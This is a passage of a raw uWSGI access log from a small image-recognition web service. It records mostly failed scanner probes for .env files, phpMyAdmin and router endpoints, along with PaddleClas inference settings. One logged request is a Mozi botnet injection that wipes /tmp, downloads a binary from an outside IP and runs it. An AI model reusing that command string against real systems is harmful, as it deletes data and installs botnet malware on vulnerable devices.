generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 24/1842] 106.14.126.174 () {36 vars in 749 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 25/1843] 106.14.126.174 () {36 vars in 715 bytes} [Thu Feb 17 14:39:33 2022] GET /phpMyAdmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 26/1844] 106.14.126.174 () {36 vars in 715 bytes} [Thu Feb 17 14:39:33 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1583/1845] 106.14.126.174 () {36 vars in 701 bytes} [Thu Feb 17 14:39:33 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1584/1846] 142.147.99.155 () {36 vars in 524 bytes} [Thu Feb 17 14:54:43 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 115/1847] 142.147.99.155 () {40 vars in 631 bytes} [Thu Feb 17 14:54:45 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1585/1848] 109.237.103.118 () {36 vars in 525 bytes} [Thu Feb 17 15:00:01 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1586/1849] 1.13.189.96 () {34 vars in 367 bytes} [Thu Feb 17 15:10:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1587/1850] 185.180.143.7 () {34 vars in 487 bytes} [Thu Feb 17 15:13:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1588/1851] 162.142.125.210 () {30 vars in 402 bytes} [Thu Feb 17 15:35:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1589/1852] 162.142.125.210 () {22 vars in 236 bytes} [Thu 
Feb 17 15:35:20 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1590/1853] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 17 18:10:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1591/1854] 2.57.121.44 () {34 vars in 400 bytes} [Thu Feb 17 18:16:13 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1592/1855] 163.125.58.164 () {34 vars in 651 bytes} [Thu Feb 17 19:04:21 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://163.125.58.164:52816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1593/1856] 69.194.182.218 () {36 vars in 524 bytes} [Thu Feb 17 20:10:54 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1594/1857] 69.194.182.218 () {40 vars in 631 bytes} [Thu Feb 17 20:10:55 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1595/1858] 40.124.34.150 () {36 vars in 523 bytes} [Thu Feb 17 20:52:23 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1596/1859] 40.124.34.150 () {40 vars in 630 bytes} [Thu Feb 17 20:52:24 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1597/1860] 113.31.103.17 () {30 vars in 328 bytes} [Thu Feb 17 21:07:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1598/1861] 47.242.80.75 () {32 vars in 408 bytes} [Thu Feb 17 21:10:43 2022] GET /text4041645132243 => generated 
179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1599/1862] 47.242.80.75 () {28 vars in 306 bytes} [Thu Feb 17 21:10:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 8/1863] 47.242.80.75 () {32 vars in 394 bytes} [Thu Feb 17 21:10:43 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 6/1864] 47.242.80.75 () {34 vars in 410 bytes} [Thu Feb 17 21:10:43 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1600/1865] 47.242.80.75 () {32 vars in 384 bytes} [Thu Feb 17 21:10:43 2022] GET /HNAP1 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 116/1866] 47.242.80.75 () {36 vars in 462 bytes} [Thu Feb 17 21:10:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 56/1867] 47.242.80.75 () {34 vars in 413 bytes} [Thu Feb 17 21:10:54 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1601/1868] 2.57.121.44 () {34 vars in 400 bytes} [Thu Feb 17 21:27:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1602/1869] 209.17.96.114 () {30 vars in 410 bytes} [Thu Feb 17 21:40:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1603/1870] 164.90.197.46 () {32 vars in 439 bytes} [Thu Feb 17 21:47:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1604/1871] 83.97.20.34 () {30 vars in 329 
bytes} [Thu Feb 17 21:51:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1605/1872] 89.163.231.26 () {36 vars in 523 bytes} [Thu Feb 17 23:46:15 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1606/1873] 89.163.231.26 () {40 vars in 630 bytes} [Thu Feb 17 23:46:16 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1607/1874] 89.163.231.26 () {36 vars in 523 bytes} [Thu Feb 17 23:47:38 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1608/1875] 89.163.231.26 () {40 vars in 630 bytes} [Thu Feb 17 23:47:38 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1609/1876] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 00:03:50 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1610/1877] 47.101.189.57 () {34 vars in 459 bytes} [Fri Feb 18 00:10:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1611/1878] 183.136.225.56 () {34 vars in 456 bytes} [Fri Feb 18 00:47:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1612/1879] 20.151.201.9 () {32 vars in 447 bytes} [Fri Feb 18 01:17:22 2022] GET /cgi-bin/luci => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1613/1880] 192.241.212.44 () {34 vars in 394 bytes} [Fri Feb 18 02:00:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 1614/1881] 183.71.240.82 () {36 vars in 699 bytes} [Fri Feb 18 02:01:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1615/1882] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 18 02:26:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1616/1883] 64.62.197.182 () {28 vars in 307 bytes} [Fri Feb 18 03:51:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 167.248.133.46 client_port: 39613] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19147|app: 0|req: 117/1884] 167.248.133.46 () {24 vars in 266 bytes} [Fri Feb 18 04:24:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1617/1885] 167.248.133.46 () {30 vars in 401 bytes} [Fri Feb 18 04:24:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1618/1886] 167.248.133.46 () {22 vars in 235 bytes} [Fri Feb 18 04:24:21 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1619/1887] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 04:28:37 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1620/1888] 82.76.165.109 () {36 vars in 523 bytes} [Fri Feb 18 05:28:26 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1621/1889] 82.76.165.109 () {40 vars in 630 bytes} [Fri Feb 18 05:28:27 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
1622/1890] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 06:06:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1623/1891] 68.66.164.26 () {36 vars in 522 bytes} [Fri Feb 18 06:14:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1624/1892] 68.66.164.26 () {40 vars in 629 bytes} [Fri Feb 18 06:15:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1625/1893] 151.11.200.2 () {32 vars in 469 bytes} [Fri Feb 18 07:40:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1626/1894] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 07:58:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-18 08:42:06 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-18 08:42:06 INFO: DetPostProcess : +2022-02-18 08:42:06 INFO: DetPreProcess : +2022-02-18 08:42:06 INFO: transform_ops : +2022-02-18 08:42:06 INFO: DetResize : +2022-02-18 08:42:06 INFO: interp : 2 +2022-02-18 08:42:06 INFO: keep_ratio : False +2022-02-18 08:42:06 INFO: target_size : [640, 640] +2022-02-18 08:42:06 INFO: DetNormalizeImage : +2022-02-18 08:42:06 INFO: is_scale : True +2022-02-18 08:42:06 INFO: mean : [0.485, 0.456, 0.406] +2022-02-18 08:42:06 INFO: std : [0.229, 0.224, 0.225] +2022-02-18 08:42:06 INFO: DetPermute : +2022-02-18 08:42:06 INFO: Global : +2022-02-18 08:42:06 INFO: batch_size : 1 +2022-02-18 08:42:06 INFO: cpu_num_threads : 1 +2022-02-18 08:42:06 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-18 08:42:06 INFO: enable_benchmark : True +2022-02-18 08:42:06 INFO: enable_mkldnn : True +2022-02-18 08:42:06 INFO: enable_profile : False +2022-02-18 08:42:06 INFO: gpu_mem : 8000 +2022-02-18 08:42:06 INFO: image_shape : [3, 640, 640] +2022-02-18 08:42:06 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-18 08:42:06 INFO: ir_optim : True +2022-02-18 08:42:06 INFO: labe_list : ['foreground'] +2022-02-18 08:42:06 INFO: max_det_results : 5 +2022-02-18 08:42:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-18 08:42:06 INFO: rec_nms_thresold : 0.05 +2022-02-18 08:42:06 INFO: threshold : 0.2 +2022-02-18 08:42:06 INFO: use_fp16 : False +2022-02-18 08:42:06 INFO: use_gpu : False +2022-02-18 08:42:06 INFO: use_tensorrt : False +2022-02-18 08:42:06 INFO: IndexProcess : +2022-02-18 08:42:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-18 08:42:06 INFO: return_k : 5 +2022-02-18 
08:42:06 INFO: score_thres : 0.5 +2022-02-18 08:42:06 INFO: RecPostProcess : None +2022-02-18 08:42:06 INFO: RecPreProcess : +2022-02-18 08:42:06 INFO: transform_ops : +2022-02-18 08:42:06 INFO: ResizeImage : +2022-02-18 08:42:06 INFO: size : 224 +2022-02-18 08:42:06 INFO: NormalizeImage : +2022-02-18 08:42:06 INFO: mean : [0.485, 0.456, 0.406] +2022-02-18 08:42:06 INFO: order : +2022-02-18 08:42:06 INFO: scale : 0.00392157 +2022-02-18 08:42:06 INFO: std : [0.229, 0.224, 0.225] +2022-02-18 08:42:06 INFO: ToCHWImage : None +Inference: 377.31361389160156 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1627/1895] 223.167.141.7 () {34 vars in 448 bytes} [Fri Feb 18 08:42:05 2022] POST /reference_client/ => generated 98 bytes in 2968 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) +[pid: 19148|app: 0|req: 1628/1896] 39.103.163.202 () {22 vars in 235 bytes} [Fri Feb 18 09:46:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1629/1897] 39.103.163.202 () {22 vars in 297 bytes} [Fri Feb 18 09:46:31 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1630/1898] 39.103.163.202 () {22 vars in 239 bytes} [Fri Feb 18 09:46:39 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1631/1899] 39.103.163.202 () {22 vars in 239 bytes} [Fri Feb 18 09:46:43 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1632/1900] 39.103.163.202 () {40 vars in 485 bytes} [Fri Feb 18 09:46:48 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1633/1901] 
83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 10:03:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1634/1902] 35.195.93.98 () {42 vars in 563 bytes} [Fri Feb 18 10:30:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1635/1903] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 11:18:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1636/1904] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 11:55:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1637/1905] 180.178.93.157 () {32 vars in 464 bytes} [Fri Feb 18 12:43:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1638/1906] 1.13.189.96 () {34 vars in 367 bytes} [Fri Feb 18 12:45:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1639/1907] 1.13.189.96 () {34 vars in 367 bytes} [Fri Feb 18 13:35:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1640/1908] 39.103.166.103 () {32 vars in 503 bytes} [Fri Feb 18 13:56:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1641/1909] 38.242.212.192 () {40 vars in 568 bytes} [Fri Feb 18 14:20:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1642/1910] 47.99.44.18 () {30 vars in 363 bytes} [Fri Feb 18 15:24:53 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19147|app: 0|req: 118/1911] 47.99.44.18 () {42 vars in 885 bytes} [Fri Feb 18 15:24:53 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1643/1912] 217.146.82.20 () {32 vars in 468 bytes} [Fri Feb 18 15:27:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1644/1913] 23.99.198.33 () {36 vars in 588 bytes} [Fri Feb 18 15:36:57 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 119/1914] 23.99.198.33 () {40 vars in 695 bytes} [Fri Feb 18 15:36:57 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1645/1915] 14.207.60.195 () {32 vars in 464 bytes} [Fri Feb 18 15:45:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1646/1916] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 15:51:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1647/1917] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 15:55:19 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1648/1918] 167.248.133.120 () {28 vars in 312 bytes} [Fri Feb 18 16:08:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1649/1919] 167.248.133.120 () {34 vars in 444 bytes} [Fri Feb 18 16:08:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1650/1920] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 17:39:47 2022] GET / => generated 179 
bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1651/1921] 112.124.106.120 () {34 vars in 459 bytes} [Fri Feb 18 18:30:50 2022] GET /hunmj_serverApi/test.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1652/1922] 46.40.34.137 () {32 vars in 463 bytes} [Fri Feb 18 18:50:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1653/1923] 47.105.152.112 () {36 vars in 660 bytes} [Fri Feb 18 20:36:33 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1654/1924] 47.105.152.112 () {36 vars in 646 bytes} [Fri Feb 18 20:36:33 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1655/1925] 47.105.152.112 () {36 vars in 646 bytes} [Fri Feb 18 20:36:33 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1656/1926] 45.143.144.187 () {36 vars in 524 bytes} [Fri Feb 18 20:59:46 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1657/1927] 45.143.144.187 () {40 vars in 631 bytes} [Fri Feb 18 20:59:47 2022] POST / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1658/1928] 23.99.198.33 () {36 vars in 588 bytes} [Fri Feb 18 21:06:54 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1659/1929] 23.99.198.33 () {40 vars in 695 bytes} [Fri Feb 18 21:06:55 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19148|app: 0|req: 1660/1930] 78.109.192.19 () {32 vars in 463 bytes} [Fri Feb 18 21:10:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1661/1931] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 21:12:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1662/1932] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 21:44:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1663/1933] 194.49.68.118 () {36 vars in 523 bytes} [Fri Feb 18 23:04:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1664/1934] 194.49.68.118 () {40 vars in 630 bytes} [Fri Feb 18 23:04:59 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1665/1935] 209.17.97.2 () {30 vars in 408 bytes} [Fri Feb 18 23:51:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1666/1936] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 23:52:30 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1667/1937] 91.207.244.204 () {32 vars in 464 bytes} [Sat Feb 19 00:53:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1668/1938] 69.164.222.170 () {34 vars in 394 bytes} [Sat Feb 19 01:43:10 2022] 
GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1669/1939] 47.101.190.233 () {34 vars in 460 bytes} [Sat Feb 19 01:53:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1670/1940] 5.239.151.91 () {32 vars in 469 bytes} [Sat Feb 19 02:23:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 120/1941] 39.98.125.176 () {32 vars in 409 bytes} [Sat Feb 19 02:35:42 2022] GET /text4041645238142 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1671/1942] 39.98.125.176 () {34 vars in 411 bytes} [Sat Feb 19 02:35:42 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 57/1943] 39.98.125.176 () {32 vars in 395 bytes} [Sat Feb 19 02:35:42 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1672/1944] 39.98.125.176 () {32 vars in 385 bytes} [Sat Feb 19 02:35:42 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 58/1945] 39.98.125.176 () {28 vars in 307 bytes} [Sat Feb 19 02:35:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 28/1946] 39.98.125.176 () {36 vars in 463 bytes} [Sat Feb 19 02:35:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 27/1947] 39.98.125.176 () {34 vars in 414 bytes} [Sat Feb 19 02:35:53 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
